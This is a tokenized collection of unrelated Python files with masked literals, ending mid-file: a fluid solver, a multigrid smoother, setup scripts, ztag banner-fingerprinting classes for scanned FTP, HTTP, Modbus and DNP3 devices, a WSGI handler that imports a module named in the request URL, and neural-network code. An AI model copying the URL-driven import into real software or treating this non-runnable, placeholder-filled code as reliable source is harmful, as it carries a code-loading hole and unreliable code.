<EOL> dtdx = self . dt / myg . dx <EOL> dtdy = self . dt / myg . dy <EOL> for n in range ( self . vars . nvar ) : <EOL> var = self . cc_data . get_var_by_index ( n ) <EOL> var . v ( ) [ : , : ] += dtdx * ( Flux_x . v ( n = n ) - Flux_x . ip ( <NUM_LIT:1> , n = n ) ) + dtdy * ( Flux_y . v ( n = n ) - Flux_y . jp ( <NUM_LIT:1> , n = n ) ) <EOL> ymom . d [ : , : ] += <NUM_LIT:0.5> * self . dt * ( dens . d [ : , : ] + old_dens . d [ : , : ] ) * grav <EOL> ener . d [ : , : ] += <NUM_LIT:0.5> * self . dt * ( ymom . d [ : , : ] + old_ymom . d [ : , : ] ) * grav <EOL> self . cc_data . t += self . dt <EOL> self . n += <NUM_LIT:1> <EOL> tm_evolve . end ( ) <EOL> def dovis ( self ) : <EOL> """<STR_LIT>""" <EOL> plt . clf ( ) <EOL> plt . rc ( "<STR_LIT>" , size = <NUM_LIT:10> ) <EOL> dens = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> xmom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ymom = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> ener = self . cc_data . get_var ( "<STR_LIT>" ) <EOL> u = xmom / dens <EOL> v = ymom / dens <EOL> magvel = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> <EOL> rhoe = ( ener - <NUM_LIT:0.5> * dens * magvel ) <EOL> magvel = np . sqrt ( magvel ) <EOL> e = rhoe / dens <EOL> gamma = self . cc_data . get_aux ( "<STR_LIT>" ) <EOL> p = eos . pres ( gamma , dens , e ) <EOL> myg = self . cc_data . grid <EOL> L_x = self . cc_data . grid . xmax - self . cc_data . grid . xmin <EOL> L_y = self . cc_data . grid . ymax - self . cc_data . grid . ymin <EOL> orientation = "<STR_LIT>" <EOL> shrink = <NUM_LIT:1.0> <EOL> sparseX = <NUM_LIT:0> <EOL> allYlabel = <NUM_LIT:1> <EOL> if L_x > <NUM_LIT:2> * L_y : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:4> , ncols = <NUM_LIT:1> , num = <NUM_LIT:1> ) <EOL> orientation = "<STR_LIT>" <EOL> if ( L_x > <NUM_LIT:4> * L_y ) : <EOL> shrink = <NUM_LIT> <EOL> onLeft = list ( range ( self . vars . nvar ) ) <EOL> elif L_y > <NUM_LIT:2> * L_x : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:1> , ncols = <NUM_LIT:4> , num = <NUM_LIT:1> ) <EOL> if ( L_y >= <NUM_LIT:3> * L_x ) : <EOL> shrink = <NUM_LIT:0.5> <EOL> sparseX = <NUM_LIT:1> <EOL> allYlabel = <NUM_LIT:0> <EOL> onLeft = [ <NUM_LIT:0> ] <EOL> else : <EOL> fig , axes = plt . subplots ( nrows = <NUM_LIT:2> , ncols = <NUM_LIT:2> , num = <NUM_LIT:1> ) <EOL> plt . subplots_adjust ( hspace = <NUM_LIT> ) <EOL> onLeft = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> fields = [ dens , magvel , p , e ] <EOL> field_names = [ r"<STR_LIT>" , r"<STR_LIT>" , "<STR_LIT:p>" , "<STR_LIT:e>" ] <EOL> for n in range ( <NUM_LIT:4> ) : <EOL> ax = axes . flat [ n ] <EOL> v = fields [ n ] <EOL> img = ax . imshow ( np . transpose ( v . v ( ) ) , <EOL> interpolation = "<STR_LIT>" , origin = "<STR_LIT>" , <EOL> extent = [ myg . xmin , myg . xmax , myg . ymin , myg . ymax ] ) <EOL> ax . set_xlabel ( "<STR_LIT:x>" ) <EOL> if n == <NUM_LIT:0> : <EOL> ax . set_ylabel ( "<STR_LIT:y>" ) <EOL> elif allYlabel : <EOL> ax . set_ylabel ( "<STR_LIT:y>" ) <EOL> ax . set_title ( field_names [ n ] ) <EOL> if not n in onLeft : <EOL> ax . yaxis . offsetText . set_visible ( False ) <EOL> if n > <NUM_LIT:0> : ax . get_yaxis ( ) . set_visible ( False ) <EOL> if sparseX : <EOL> ax . xaxis . set_major_locator ( plt . MaxNLocator ( <NUM_LIT:3> ) ) <EOL> plt . colorbar ( img , ax = ax , orientation = orientation , shrink = shrink ) <EOL> plt . figtext ( <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" % self . cc_data . t ) <EOL> plt . draw ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import multigrid . edge_coeffs as ec <EOL> import multigrid . MG as MG <EOL> np . set_printoptions ( precision = <NUM_LIT:3> , linewidth = <NUM_LIT> ) <EOL> class GeneralMG2d ( MG . CellCenterMG2d ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nx , ny , xmin = <NUM_LIT:0.0> , xmax = <NUM_LIT:1.0> , ymin = <NUM_LIT:0.0> , ymax = <NUM_LIT:1.0> , <EOL> xl_BC_type = "<STR_LIT>" , xr_BC_type = "<STR_LIT>" , <EOL> yl_BC_type = "<STR_LIT>" , yr_BC_type = "<STR_LIT>" , <EOL> xl_BC = None , xr_BC = None , <EOL> yl_BC = None , yr_BC = None , <EOL> nsmooth = <NUM_LIT:10> , nsmooth_bottom = <NUM_LIT:50> , <EOL> verbose = <NUM_LIT:0> , <EOL> coeffs = None , <EOL> true_function = None , vis = <NUM_LIT:0> , vis_title = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . beta_edge = [ ] <EOL> MG . CellCenterMG2d . __init__ ( self , nx , ny , ng = <NUM_LIT:1> , <EOL> xmin = xmin , xmax = xmax , ymin = ymin , ymax = ymax , <EOL> xl_BC_type = xl_BC_type , xr_BC_type = xr_BC_type , <EOL> yl_BC_type = yl_BC_type , yr_BC_type = yr_BC_type , <EOL> xl_BC = xl_BC , xr_BC = xr_BC , <EOL> yl_BC = yl_BC , yr_BC = yr_BC , <EOL> alpha = <NUM_LIT:0.0> , beta = <NUM_LIT:0.0> , <EOL> nsmooth = nsmooth , nsmooth_bottom = nsmooth_bottom , <EOL> verbose = verbose , <EOL> aux_field = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> aux_bc = [ coeffs . BCs [ "<STR_LIT>" ] , coeffs . BCs [ "<STR_LIT>" ] , <EOL> coeffs . BCs [ "<STR_LIT>" ] , coeffs . BCs [ "<STR_LIT>" ] ] , <EOL> true_function = true_function , vis = vis , <EOL> vis_title = vis_title ) <EOL> for c in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> v = self . grids [ self . nlevels - <NUM_LIT:1> ] . get_var ( c ) <EOL> v . v ( ) [ : , : ] = coeffs . get_var ( c ) . v ( ) <EOL> self . grids [ self . nlevels - <NUM_LIT:1> ] . fill_BC ( c ) <EOL> n = self . nlevels - <NUM_LIT:2> <EOL> while n >= <NUM_LIT:0> : <EOL> f_patch = self . grids [ n + <NUM_LIT:1> ] <EOL> c_patch = self . grids [ n ] <EOL> coeffs_c = c_patch . get_var ( c ) <EOL> coeffs_c . v ( ) [ : , : ] = f_patch . restrict ( c ) . v ( ) <EOL> self . grids [ n ] . fill_BC ( c ) <EOL> n -= <NUM_LIT:1> <EOL> beta = self . grids [ self . nlevels - <NUM_LIT:1> ] . get_var ( "<STR_LIT>" ) <EOL> self . beta_edge . insert ( <NUM_LIT:0> , ec . EdgeCoeffs ( self . grids [ self . nlevels - <NUM_LIT:1> ] . grid , beta ) ) <EOL> n = self . nlevels - <NUM_LIT:2> <EOL> while n >= <NUM_LIT:0> : <EOL> self . beta_edge . insert ( <NUM_LIT:0> , self . beta_edge [ <NUM_LIT:0> ] . restrict ( ) ) <EOL> n -= <NUM_LIT:1> <EOL> def smooth ( self , level , nsmooth ) : <EOL> """<STR_LIT>""" <EOL> v = self . grids [ level ] . get_var ( "<STR_LIT:v>" ) <EOL> f = self . grids [ level ] . get_var ( "<STR_LIT:f>" ) <EOL> myg = self . grids [ level ] . grid <EOL> dx = myg . dx <EOL> dy = myg . dy <EOL> self . grids [ level ] . fill_BC ( "<STR_LIT:v>" ) <EOL> alpha = self . grids [ level ] . get_var ( "<STR_LIT>" ) <EOL> gamma_x = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dx <EOL> gamma_y = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dy <EOL> beta_x = self . beta_edge [ level ] . x <EOL> beta_y = self . beta_edge [ level ] . y <EOL> for i in range ( nsmooth ) : <EOL> for n , ( ix , iy ) in enumerate ( [ ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ] ) : <EOL> denom = ( <EOL> alpha . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> beta_x . ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - beta_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> beta_y . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) - beta_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) <EOL> v . ip_jp ( ix , iy , s = <NUM_LIT:2> ) [ : , : ] = ( f . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_x . ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) + gamma_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - gamma_x . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( - <NUM_LIT:1> + ix , iy , s = <NUM_LIT:2> ) - <EOL> ( beta_y . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) + gamma_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( ix , <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) - <EOL> ( beta_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) - gamma_y . ip_jp ( ix , iy , s = <NUM_LIT:2> ) ) * <EOL> v . ip_jp ( ix , - <NUM_LIT:1> + iy , s = <NUM_LIT:2> ) ) / denom <EOL> if n == <NUM_LIT:1> or n == <NUM_LIT:3> : <EOL> self . grids [ level ] . fill_BC ( "<STR_LIT:v>" ) <EOL> if self . vis == <NUM_LIT:1> : <EOL> plt . clf ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_solution ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_V ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_main_solution ( ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> self . _draw_main_error ( ) <EOL> plt . suptitle ( self . vis_title , fontsize = <NUM_LIT> ) <EOL> plt . draw ( ) <EOL> plt . savefig ( "<STR_LIT>" % ( self . frame ) ) <EOL> self . frame += <NUM_LIT:1> <EOL> def _compute_residual ( self , level ) : <EOL> """<STR_LIT>""" <EOL> v = self . grids [ level ] . get_var ( "<STR_LIT:v>" ) <EOL> f = self . grids [ level ] . get_var ( "<STR_LIT:f>" ) <EOL> r = self . grids [ level ] . get_var ( "<STR_LIT:r>" ) <EOL> myg = self . grids [ level ] . grid <EOL> dx = myg . dx <EOL> dy = myg . dy <EOL> alpha = self . grids [ level ] . get_var ( "<STR_LIT>" ) <EOL> gamma_x = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dx <EOL> gamma_y = <NUM_LIT:0.5> * self . grids [ level ] . get_var ( "<STR_LIT>" ) / dy <EOL> beta_x = self . beta_edge [ level ] . x <EOL> beta_y = self . beta_edge [ level ] . y <EOL> L_eta_phi = ( <EOL> alpha . v ( ) * v . v ( ) + <EOL> beta_x . ip ( <NUM_LIT:1> ) * ( v . ip ( <NUM_LIT:1> ) - v . v ( ) ) - <EOL> beta_x . v ( ) * ( v . v ( ) - v . ip ( - <NUM_LIT:1> ) ) + <EOL> beta_y . jp ( <NUM_LIT:1> ) * ( v . jp ( <NUM_LIT:1> ) - v . v ( ) ) - <EOL> beta_y . v ( ) * ( v . v ( ) - v . jp ( - <NUM_LIT:1> ) ) + <EOL> gamma_x . v ( ) * ( v . ip ( <NUM_LIT:1> ) - v . ip ( - <NUM_LIT:1> ) ) + <EOL> gamma_y . v ( ) * ( v . jp ( <NUM_LIT:1> ) - v . jp ( - <NUM_LIT:1> ) ) <EOL> ) <EOL> r . v ( ) [ : , : ] = f . v ( ) - L_eta_phi </s>
<s> __author__ = '<STR_LIT>' <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> include_package_data = True <EOL> ) </s>
<s> import re <EOL> from ztag . annotation import Annotation <EOL> from ztag . annotation import OperatingSystem <EOL> from ztag . annotation import Type <EOL> from ztag . annotation import Manufacturer <EOL> from ztag import protocols <EOL> import ztag . test <EOL> class FtpBelkin ( Annotation ) : <EOL> protocol = protocols . FTP <EOL> subprotocol = protocols . FTP . BANNER <EOL> port = None <EOL> manufact_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> tests = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : Type . USB_HUB , <EOL> "<STR_LIT>" : Manufacturer . BELKIN <EOL> } <EOL> } <EOL> } <EOL> def process ( self , obj , meta ) : <EOL> banner = obj [ "<STR_LIT>" ] <EOL> tagged = False <EOL> if self . manufact_re . search ( banner ) : <EOL> meta . global_metadata . device_type = Type . USB_HUB <EOL> meta . global_metadata . manufacturer = Manufacturer . BELKIN <EOL> tagged = True <EOL> if tagged : <EOL> return meta <EOL> else : <EOL> return None </s>
<s> from ztag . annotation import Annotation <EOL> from ztag . annotation import Type <EOL> from ztag . annotation import Manufacturer <EOL> from ztag import protocols <EOL> import ztag . test <EOL> import re <EOL> class FtpLatronix ( Annotation ) : <EOL> name = "<STR_LIT>" <EOL> protocol = protocols . FTP <EOL> subprotocol = protocols . FTP . BANNER <EOL> port = None <EOL> product_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> tests = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : Type . PRINT_SERVER , <EOL> "<STR_LIT>" : Manufacturer . LANTRONIX , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:version>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> def process ( self , obj , meta ) : <EOL> banner = obj [ "<STR_LIT>" ] <EOL> if self . product_re . search ( banner ) : <EOL> meta . global_metadata . device_type = Type . PRINT_SERVER <EOL> meta . global_metadata . manufacturer = Manufacturer . LANTRONIX <EOL> meta . global_metadata . product = "<STR_LIT>" <EOL> version = self . product_re . search ( banner ) . group ( <NUM_LIT:1> ) <EOL> meta . local_metadata . version = version <EOL> return meta </s>
<s> import re <EOL> from ztag . annotation import Annotation <EOL> from ztag . annotation import OperatingSystem <EOL> from ztag . annotation import Type <EOL> from ztag . annotation import Manufacturer <EOL> from ztag import protocols <EOL> import ztag . test <EOL> class FtpTenor ( Annotation ) : <EOL> protocol = protocols . FTP <EOL> subprotocol = protocols . FTP . BANNER <EOL> port = None <EOL> manufact_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> version_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> tests = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : Type . SOHO_ROUTER , <EOL> "<STR_LIT>" : Manufacturer . SONUS , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:version>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> def process ( self , obj , meta ) : <EOL> banner = obj [ "<STR_LIT>" ] <EOL> if self . manufact_re . search ( banner ) : <EOL> meta . global_metadata . device_type = Type . SOHO_ROUTER <EOL> meta . global_metadata . manufacturer = Manufacturer . SONUS <EOL> meta . global_metadata . product = "<STR_LIT>" <EOL> match = self . version_re . search ( banner ) <EOL> meta . local_metadata . product = match . group ( <NUM_LIT:1> ) <EOL> meta . local_metadata . version = match . group ( <NUM_LIT:2> ) <EOL> return meta <EOL> """<STR_LIT>""" </s>
<s> from ztag . annotation import * <EOL> class AVTECHDevice ( Annotation ) : <EOL> protocol = protocols . MODBUS <EOL> subprotocol = protocols . MODBUS . DEVICE_ID <EOL> port = None <EOL> def process ( self , obj , meta ) : <EOL> vendor = d [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] . lower ( ) <EOL> if "<STR_LIT>" in vendor : <EOL> meta . global_metadata . manufacturer = Manufacturer . AVTECH <EOL> meta . tags . add ( "<STR_LIT>" ) </s>
<s> from ztag . annotation import * <EOL> import re <EOL> class Helix ( Annotation ) : <EOL> protocol = protocols . HTTP <EOL> subprotocol = protocols . HTTP . GET <EOL> port = None <EOL> version_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> os_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> def process ( self , obj , meta ) : <EOL> server = obj [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> if server . startswith ( "<STR_LIT>" ) : <EOL> meta . local_metadata . product = "<STR_LIT>" <EOL> version = self . version_re . search ( server ) . group ( <NUM_LIT:1> ) <EOL> meta . local_metadata . version = version <EOL> os = self . os_re . search ( server ) . group ( <NUM_LIT:1> ) <EOL> if "<STR_LIT>" in os : <EOL> meta . global_metadata . os = OperatingSystem . WINDOWS <EOL> elif "<STR_LIT>" in os : <EOL> meta . global_metadata . os = OperatingSystem . REDHAT <EOL> meta . global_metadata . os_version = "<STR_LIT:4>" <EOL> elif "<STR_LIT>" in os : <EOL> meta . global_metadata . os = OperatingSystem . REDHAT <EOL> meta . global_metadata . os_version = "<STR_LIT:5>" <EOL> elif "<STR_LIT>" in os : <EOL> meta . global_metadata . os = OperatingSystem . REDHAT <EOL> meta . global_metadata . os_version = "<STR_LIT>" </s>
<s> from ztag . annotation import * <EOL> class MRV1Server ( Annotation ) : <EOL> protocol = protocols . HTTP <EOL> subprotocol = protocols . HTTP . GET <EOL> port = None <EOL> def process ( self , obj , meta ) : <EOL> s = obj [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> if s . startswith ( "<STR_LIT>" ) : <EOL> meta . local_metadata . product = "<STR_LIT>" <EOL> v = s . split ( "<STR_LIT:->" ) [ <NUM_LIT:1> ] . replace ( "<STR_LIT:_>" , "<STR_LIT:.>" ) <EOL> meta . local_metadata . version = v <EOL> return meta </s>
<s> from ztag . annotation import * <EOL> class VerisIndustriesAnnotation ( Annotation ) : <EOL> protocol = protocols . MODBUS <EOL> subprotocol = protocols . MODBUS . DEVICE_ID <EOL> port = None <EOL> def process ( self , obj , meta ) : <EOL> vendor = obj [ "<STR_LIT>" ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] . lower ( ) <EOL> if "<STR_LIT>" in vendor : <EOL> meta . global_metadata . manufacturer = Manufacturer . VERIS <EOL> return meta </s>
<s> from ztag . transform import * <EOL> from ztag import protocols , errors <EOL> class DNP3Transform ( ZGrabTransform ) : <EOL> name = "<STR_LIT>" <EOL> port = <NUM_LIT> <EOL> protocol = protocols . DNP3 <EOL> subprotocol = protocols . DNP3 . STATUS <EOL> def _transform_object ( self , obj ) : <EOL> zout = ZMapTransformOutput ( ) <EOL> wrapped = Transformable ( obj ) <EOL> dnp3 = wrapped [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> if not dnp3 [ '<STR_LIT>' ] . resolve ( ) : <EOL> raise errors . IgnoreObject ( ) <EOL> out = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : dnp3 [ "<STR_LIT>" ] . resolve ( ) , <EOL> } <EOL> zout . transformed = out <EOL> return zout </s>
<s> from distutils . core import setup <EOL> import backbone <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> version = backbone . __version__ , <EOL> description = backbone . __doc__ , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> ) </s>
<s> import os , sys , time <EOL> import simplejson as json <EOL> from zohmg . config import Config <EOL> sys . path . append ( os . path . dirname ( __file__ ) ) <EOL> import data_utils <EOL> class transform ( object ) : <EOL> def __init__ ( self ) : <EOL> self . config = Config ( ) <EOL> self . table = self . config . dataset ( ) <EOL> self . projections = self . config . projections ( ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> project_dir = environ [ "<STR_LIT>" ] <EOL> url_parts = environ [ "<STR_LIT>" ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( "<STR_LIT:/>" ) <EOL> print "<STR_LIT>" % ( time . asctime ( ) , project_dir ) <EOL> if len ( url_parts ) > <NUM_LIT:1> : <EOL> start_response ( "<STR_LIT>" , [ ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> return "<STR_LIT>" % environ [ "<STR_LIT>" ] <EOL> else : <EOL> sys . path . append ( project_dir ) <EOL> usertransformer = __import__ ( "<STR_LIT>" + url_parts [ <NUM_LIT:0> ] ) <EOL> transform = usertransformer . transform <EOL> payload = data_utils . hbase_get ( self . table , self . projections , environ ) <EOL> if payload : <EOL> start_response ( "<STR_LIT>" , [ ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> return data_utils . dump_jsonp ( transform ( payload ) ) <EOL> else : <EOL> start_response ( "<STR_LIT>" , [ ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> return "<STR_LIT>" </s>
<s> import logging as loggers <EOL> logging = loggers . getLogger ( __name__ ) <EOL> import os <EOL> import tempfile <EOL> import numpy as np <EOL> import urllib <EOL> from basic import BasicDataset <EOL> URL_MAP = { <EOL> "<STR_LIT:train>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:test>" : "<STR_LIT>" <EOL> } <EOL> PATH_MAP = { <EOL> "<STR_LIT:train>" : os . path . join ( tempfile . gettempdir ( ) , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : os . path . join ( tempfile . gettempdir ( ) , "<STR_LIT>" ) , <EOL> "<STR_LIT:test>" : os . path . join ( tempfile . gettempdir ( ) , "<STR_LIT>" ) <EOL> } <EOL> class BinarizedMnistDataset ( BasicDataset ) : <EOL> def __init__ ( self ) : <EOL> for name , url in URL_MAP . items ( ) : <EOL> local_path = PATH_MAP [ name ] <EOL> if not os . path . exists ( local_path ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> np . save ( local_path , np . loadtxt ( urllib . urlretrieve ( url ) [ <NUM_LIT:0> ] ) ) <EOL> train_set = [ ( x , ) for x in np . load ( PATH_MAP [ '<STR_LIT:train>' ] ) ] <EOL> valid_set = [ ( x , ) for x in np . load ( PATH_MAP [ '<STR_LIT>' ] ) ] <EOL> test_set = [ ( x , ) for x in np . load ( PATH_MAP [ '<STR_LIT:test>' ] ) ] <EOL> super ( BinarizedMnistDataset , self ) . __init__ ( train_set , valid = valid_set , test = test_set ) </s>
<s> from . import NeuralLayer <EOL> from var import NeuralVariable <EOL> from deepy . utils import build_activation , FLOATX , XavierGlorotInitializer , OrthogonalInitializer , Scanner , neural_computation <EOL> import numpy as np <EOL> import theano . tensor as T <EOL> from abc import ABCMeta , abstractmethod <EOL> OUTPUT_TYPES = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> INPUT_TYPES = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> class RecurrentLayer ( NeuralLayer ) : <EOL> __metaclass__ = ABCMeta <EOL> def __init__ ( self , name , state_names , hidden_size = <NUM_LIT:100> , input_type = "<STR_LIT>" , output_type = "<STR_LIT>" , <EOL> inner_init = None , outer_init = None , <EOL> gate_activation = '<STR_LIT>' , activation = '<STR_LIT>' , <EOL> steps = None , backward = False , mask = None , <EOL> additional_input_dims = None ) : <EOL> super ( RecurrentLayer , self ) . __init__ ( name ) <EOL> self . state_names = state_names <EOL> self . main_state = state_names [ <NUM_LIT:0> ] <EOL> self . hidden_size = hidden_size <EOL> self . _gate_activation = gate_activation <EOL> self . _activation = activation <EOL> self . gate_activate = build_activation ( self . _gate_activation ) <EOL> self . activate = build_activation ( self . _activation ) <EOL> self . _input_type = input_type <EOL> self . _output_type = output_type <EOL> self . inner_init = inner_init if inner_init else OrthogonalInitializer ( ) <EOL> self . outer_init = outer_init if outer_init else XavierGlorotInitializer ( ) <EOL> self . _steps = steps <EOL> self . _mask = mask . tensor if type ( mask ) == NeuralVariable else mask <EOL> self . _go_backwards = backward <EOL> self . additional_input_dims = additional_input_dims if additional_input_dims else [ ] <EOL> if input_type not in INPUT_TYPES : <EOL> raise Exception ( "<STR_LIT>" . format ( name , input_type ) ) <EOL> if output_type not in OUTPUT_TYPES : <EOL> raise Exception ( "<STR_LIT>" . format ( name , output_type ) ) <EOL> @ neural_computation <EOL> def step ( self , step_inputs ) : <EOL> new_states = self . compute_new_state ( step_inputs ) <EOL> if self . _output_type == "<STR_LIT>" and step_inputs . get ( "<STR_LIT>" ) : <EOL> mask = step_inputs [ "<STR_LIT>" ] . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' ) <EOL> for state_name in new_states : <EOL> new_states [ state_name ] = new_states [ state_name ] * mask + step_inputs [ state_name ] * ( <NUM_LIT:1> - mask ) <EOL> return new_states <EOL> @ abstractmethod <EOL> def compute_new_state ( self , step_inputs ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def merge_inputs ( self , input_var , additional_inputs = None ) : <EOL> """<STR_LIT>""" <EOL> @ abstractmethod <EOL> def prepare ( self ) : <EOL> pass <EOL> @ neural_computation <EOL> def get_initial_states ( self , input_var ) : <EOL> """<STR_LIT>""" <EOL> initial_states = { } <EOL> for state in self . state_names : <EOL> initial_states [ state ] = T . alloc ( np . cast [ FLOATX ] ( <NUM_LIT:0.> ) , input_var . shape [ <NUM_LIT:0> ] , self . hidden_size ) <EOL> return initial_states <EOL> @ neural_computation <EOL> def get_step_inputs ( self , input_var , states = None , mask = None , additional_inputs = None ) : <EOL> """<STR_LIT>""" <EOL> step_inputs = { } <EOL> if self . _input_type == "<STR_LIT>" : <EOL> if not additional_inputs : <EOL> additional_inputs = [ ] <EOL> step_inputs . update ( self . merge_inputs ( input_var , additional_inputs = additional_inputs ) ) <EOL> else : <EOL> if additional_inputs : <EOL> step_inputs . update ( self . merge_inputs ( None , additional_inputs = additional_inputs ) ) <EOL> if states : <EOL> for name in self . state_names : <EOL> step_inputs [ name ] = states [ name ] <EOL> return step_inputs <EOL> def compute ( self , input_var , mask = None , additional_inputs = None , steps = None , backward = False ) : <EOL> if additional_inputs and not self . additional_input_dims : <EOL> self . additional_input_dims = map ( lambda var : var . dim ( ) , additional_inputs ) <EOL> return super ( RecurrentLayer , self ) . compute ( input_var , mask = mask , additional_inputs = additional_inputs , steps = steps , backward = backward ) <EOL> def compute_tensor ( self , input_var , mask = None , additional_inputs = None , steps = None , backward = False ) : <EOL> backward = backward if backward else self . _go_backwards <EOL> steps = steps if steps else self . _steps <EOL> mask = mask if mask else self . _mask <EOL> if mask and self . _input_type == "<STR_LIT>" : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> init_state_map = self . get_initial_states ( input_var ) <EOL> if self . _input_type == "<STR_LIT>" : <EOL> input_var = input_var . dimshuffle ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> seq_map = self . get_step_inputs ( input_var , mask = mask , additional_inputs = additional_inputs ) <EOL> else : <EOL> init_state_map [ self . main_state ] = input_var <EOL> seq_map = self . get_step_inputs ( None , mask = mask , additional_inputs = additional_inputs ) <EOL> retval_map , _ = Scanner ( <EOL> self . step , <EOL> sequences = seq_map , <EOL> outputs_info = init_state_map , <EOL> n_steps = steps , <EOL> go_backwards = backward <EOL> ) . compute ( ) <EOL> main_states = retval_map [ self . main_state ] <EOL> if self . _output_type == "<STR_LIT>" : <EOL> return main_states [ - <NUM_LIT:1> ] <EOL> elif self . _output_type == "<STR_LIT>" : <EOL> main_states = main_states . dimshuffle ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> if mask : <EOL> main_states *= mask . dimshuffle ( ( <NUM_LIT:0> , <NUM_LIT:1> , '<STR_LIT:x>' ) ) <EOL> return main_states <EOL> class RNN ( 